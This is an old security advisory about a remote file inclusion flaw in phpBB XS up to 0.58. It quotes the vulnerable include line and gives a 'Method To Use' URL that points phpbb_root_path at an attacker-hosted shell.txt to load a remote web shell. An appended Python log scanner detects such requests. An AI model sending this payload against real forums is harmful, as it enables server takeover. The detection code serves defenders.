
# Title : phpBB XS <= 0.58 (functions.php) Remote File Include Vulnerability
# Published : 2006-09-12
# Author : AzzCoder


Author: AzzCoder

Vendor: http://www.phpbbxs.eu/

Vulnerable File: includes/functions.php

Vulnerable Code:

// The phpbb_root_path variable isn't initialized

include_once( $phpbb_root_path . './includes/functions_categories_hierarchy.' . $phpEx );

Method To Use:

http://www.victim.com/[phpbb_xs]/includes/functions.php?phpbb_root_path=http://yourdomain.com/shell.txt?
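
A defender-side check for this request pattern, added here as an example (not part of the original advisory): it scans web access log lines for requests to PHP scripts that set phpbb_root_path to a URL-wrapper value, including percent-encoded forms. The log lines are constructed samples; the function name find_rfi_attempts and the common/combined log format are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line inside a common/combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# Values that would make a PHP include read from a stream wrapper, not local disk.
REMOTE_VALUE_RE = re.compile(r'^\s*(?:(?:https?|ftps?|php)://|data:)', re.I)
# Variable named in the advisory; extend the set for other path variables.
WATCHED_PARAMS = {"phpbb_root_path"}

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Sep/2006:10:01:02 +0000] "GET /forum/includes/functions.php'
    '?phpbb_root_path=http://example.invalid/x.txt? HTTP/1.1" 200 512',
    '203.0.113.7 - - [12/Sep/2006:10:01:09 +0000] "GET /forum/includes/functions.php'
    '?phpbb_root_path=hTTp%3A%2F%2Fexample.invalid%2Fx.txt%3F HTTP/1.1" 200 512',
    '198.51.100.4 - - [12/Sep/2006:10:02:00 +0000] "GET /forum/viewtopic.php?t=42 HTTP/1.1" 200 9001',
    '198.51.100.4 - - [12/Sep/2006:10:02:05 +0000] "GET /forum/index.php'
    '?phpbb_root_path=./ HTTP/1.1" 200 9001',
]


def find_rfi_attempts(lines, params=WATCHED_PARAMS):
    """Return (line_no, path, param, decoded_value) for each suspicious request."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a parsable request line
        url = urlsplit(match.group("target"))
        if not url.path.lower().endswith(".php"):
            continue
        # parse_qsl percent-decodes, so encoded schemes are caught as well.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name in params and REMOTE_VALUE_RE.match(value):
                hits.append((line_no, url.path, name, value))
    return hits


if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit)
```
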

# www.Syue.com [2006-09-12]